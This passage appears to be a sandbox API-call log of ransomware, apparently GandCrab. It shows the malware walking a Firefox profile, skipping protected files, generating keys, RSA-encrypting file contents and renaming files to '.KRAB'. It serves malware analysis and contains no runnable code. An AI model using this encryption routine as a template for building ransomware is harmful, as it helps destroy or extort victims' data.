(lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.822] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.822] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock" [0083.822] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.823] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 161 [0083.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\d2ca4a08d2ca4dee3d.lock") returned 156 [0083.823] lstrlenW (lpString=".lock") returned 5 [0083.823] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.823] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.823] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.824] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.824] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0083.824] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.824] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt" [0083.827] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.827] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt.KRAB") returned 154 [0083.827] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt") returned 149 [0083.827] lstrlenW (lpString=".txt") returned 4 [0083.827] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.827] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.828] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt") returned 149 [0083.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\KRAB-DECRYPT.txt") returned 149 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.828] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.828] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.829] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 0 [0083.829] FindClose (in: hFindFile=0x1023238 | out: hFindFile=0x1023238) returned 1 [0083.829] CloseHandle (hObject=0x420) returned 1 [0083.829] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0083.829] lstrcmpW (lpString1="2918063365piupsah.sqlite", lpString2=".") returned 1 [0083.829] lstrcmpW (lpString1="2918063365piupsah.sqlite", lpString2="..") returned 1 [0083.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="2918063365piupsah.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" [0083.829] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.829] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.KRAB") returned 138 [0083.830] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0083.830] lstrlenW (lpString=".sqlite") returned 7 [0083.830] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.830] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0083.830] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.830] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0083.830] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned 133 [0083.830] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="desktop.ini") returned -1 [0083.830] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="autorun.inf") returned -1 [0083.830] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntuser.dat") returned -1 [0083.830] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="iconcache.db") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="bootsect.bak") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="boot.ini") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntuser.dat.log") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="thumbs.db") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="ntldr") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="NTDETECT.COM") returned -1 [0083.831] lstrcmpiW (lpString1="2918063365piupsah.sqlite", lpString2="Bootfont.bin") returned -1 [0083.831] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.831] CryptAcquireContextW (in: phProv=0x338dab4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dab4*=0x1011700) returned 1 [0083.833] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.833] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.833] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.833] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338db4c | out: pbBuffer=0x338db4c) returned 1 [0083.834] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0083.834] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.834] CryptAcquireContextW (in: phProv=0x338dab4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dab4*=0x10112c0) returned 1 [0083.835] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.900] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.901] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.901] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x8, pbBuffer=0x338db6c | out: pbBuffer=0x338db6c) returned 1 [0083.901] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0083.901] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.901] CryptAcquireContextW (in: phProv=0x338daac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338daac*=0x1011898) returned 1 [0083.903] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dab0 | out: phKey=0x338dab0*=0x1023238) returned 1 [0083.903] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338daa4, pdwDataLen=0x338daa8, dwFlags=0x0 | out: pbData=0x338daa4*=0x800, pdwDataLen=0x338daa8*=0x4) returned 1 [0083.903] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dadc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dadc*=0x100) returned 1 [0083.903] GetLastError () returned 0x0 [0083.903] CryptDestroyKey (hKey=0x1023238) returned 1 [0083.903] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.904] CryptAcquireContextW (in: phProv=0x338daac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338daac*=0x1010a40) returned 1 [0083.905] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dab0 | out: phKey=0x338dab0*=0x1023238) returned 1 [0083.905] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338daa4, pdwDataLen=0x338daa8, dwFlags=0x0 | out: pbData=0x338daa4*=0x800, pdwDataLen=0x338daa8*=0x4) returned 1 [0083.905] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dadc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dadc*=0x100) returned 1 [0083.906] GetLastError () returned 0x0 [0083.906] CryptDestroyKey (hKey=0x1023238) returned 1 [0083.906] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0083.906] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0083.906] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.907] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.907] ReadFile (in: hFile=0x420, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338db7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338db7c*=0xc000, lpOverlapped=0x0) returned 1 [0083.930] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0xffff4000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.930] WriteFile (in: hFile=0x420, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xc000, lpNumberOfBytesWritten=0x338db78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338db78*=0xc000, lpOverlapped=0x0) returned 1 [0083.931] WriteFile (in: hFile=0x420, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338db78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338db78*=0x208, lpOverlapped=0x0) returned 1 [0083.931] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.935] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.935] CloseHandle (hObject=0x420) returned 1 [0083.935] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.936] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite.krab")) returned 1 [0083.937] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.937] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0083.937] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.937] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.937] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock" [0083.937] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.938] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 137 [0083.938] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\d2ca4a08d2ca4dee3d.lock") returned 132 [0083.938] lstrlenW (lpString=".lock") returned 5 [0083.938] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.938] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.938] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.938] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.939] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0083.939] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.939] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.939] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt" [0083.939] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.939] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt.KRAB") returned 130 [0083.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt") returned 125 [0083.939] lstrlenW (lpString=".txt") returned 4 [0083.939] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.940] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.940] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt") returned 125 [0083.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\KRAB-DECRYPT.txt") returned 125 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.940] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.941] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.941] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 0 [0083.941] FindClose (in: hFindFile=0x1023338 | out: hFindFile=0x1023338) returned 1 [0083.941] CloseHandle (hObject=0x7dc) returned 1 [0083.941] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.941] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.941] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.941] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt" [0083.942] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.942] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt.KRAB") returned 126 [0083.942] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt") returned 121 [0083.942] lstrlenW (lpString=".txt") returned 4 [0083.942] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.942] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.943] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt") returned 121 [0083.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\KRAB-DECRYPT.txt") returned 121 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.943] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.943] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.944] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0083.944] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0083.944] CloseHandle (hObject=0x72c) returned 1 [0083.944] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0083.944] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0083.944] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0083.944] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock" [0083.944] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.944] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 126 [0083.945] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\d2ca4a08d2ca4dee3d.lock") returned 121 [0083.945] lstrlenW (lpString=".lock") returned 5 [0083.945] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.947] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0083.947] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.947] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.947] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0083.947] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0083.947] lstrcmpW 